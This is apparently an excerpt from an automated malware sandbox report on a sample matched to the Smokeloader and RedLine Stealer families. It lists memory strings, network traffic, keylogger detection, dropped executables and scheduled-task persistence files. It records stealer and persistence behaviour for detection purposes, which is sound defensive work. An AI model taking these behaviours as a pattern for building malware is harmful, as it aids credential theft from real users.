Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/x1024
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/startQuery/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/n=c
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: 8e8f4571c5.exe, 00000018.00000002.3383993209.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 0000001F.00000002.2952598665.000001B104580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 0000001F.00000003.2909414064.000001B111826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHRE
Source: firefox.exe, 0000001F.00000003.2909698266.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107486000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_shouldViewDownloadInternally/
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounthttps://www.youtube.com/account
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountr
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounttipShownCount.searchTip_onboard
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountzA
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account~
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49852 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: 8e8f4571c5.exe, 00000018.00000002.3331828865.0000000001D97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_GETRAWINPUTDATAI memstr_0a7d6275-2
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: 8e8f4571c5.exe PID: 8136, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e8f4571c5.exe PID: 6484, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.2719081231.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.2994648505.0000000002620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2828964278.00000000026F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2496144397.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2495938996.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.2718459013.000000000254D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2828820044.00000000026B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.2994271346.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Binary is likely a compiled AutoIt script file
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_86eb88e9-9
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f37d7c6e-6
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ea29f676-6
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4b1059e0-7
PE file contains section with special chars
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .idata
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C6DF280
Creates files inside the system directory
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D35A0 0_2_6C6D35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74545C 0_2_6C74545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E5440 0_2_6C6E5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74542B 0_2_6C74542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C715C10 0_2_6C715C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C722C10 0_2_6C722C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74AC00 0_2_6C74AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C716CF0 0_2_6C716CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DD4E0 0_2_6C6DD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E64C0 0_2_6C6E64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FD4D0 0_2_6C6FD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7334A0 0_2_6C7334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73C4A0 0_2_6C73C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6C80 0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C700512 0_2_6C700512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EFD00 0_2_6C6EFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FED10 0_2_6C6FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7385F0 0_2_6C7385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C710DD0 0_2_6C710DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C746E63 0_2_6C746E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DC670 0_2_6C6DC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C713E50 0_2_6C713E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F4640 0_2_6C6F4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C722E4E 0_2_6C722E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F9E50 0_2_6C6F9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C739E30 0_2_6C739E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C717E10 0_2_6C717E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C725600 0_2_6C725600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7476E3 0_2_6C7476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DBEF0 0_2_6C6DBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EFEF0 0_2_6C6EFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C734EA0 0_2_6C734EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73E680 0_2_6C73E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F5E90 0_2_6C6F5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C717710 0_2_6C717710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E9F00 0_2_6C6E9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C706FF0 0_2_6C706FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DDFE0 0_2_6C6DDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7277A0 0_2_6C7277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71F070 0_2_6C71F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F8850 0_2_6C6F8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FD850 0_2_6C6FD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71B820 0_2_6C71B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C724820 0_2_6C724820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E7810 0_2_6C6E7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FC0E0 0_2_6C6FC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7158E0 0_2_6C7158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7450C7 0_2_6C7450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7060A0 0_2_6C7060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72B970 0_2_6C72B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74B170 0_2_6C74B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6ED960 0_2_6C6ED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FA940 0_2_6C6FA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70D9B0 0_2_6C70D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DC9A0 0_2_6C6DC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C715190 0_2_6C715190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C732990 0_2_6C732990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C719A60 0_2_6C719A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71E2F0 0_2_6C71E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F1AF0 0_2_6C6F1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C718AC0 0_2_6C718AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C742AB0 0_2_6C742AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D22A0 0_2_6C6D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C704AA0 0_2_6C704AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6ECAB0 0_2_6C6ECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74BA90 0_2_6C74BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EC370 0_2_6C6EC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D5340 0_2_6C6D5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71D320 0_2_6C71D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7453C8 0_2_6C7453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DF380 0_2_6C6DF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AC60 0_2_6C78AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C846C00 0_2_6C846C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7DECD0 0_2_6C7DECD0
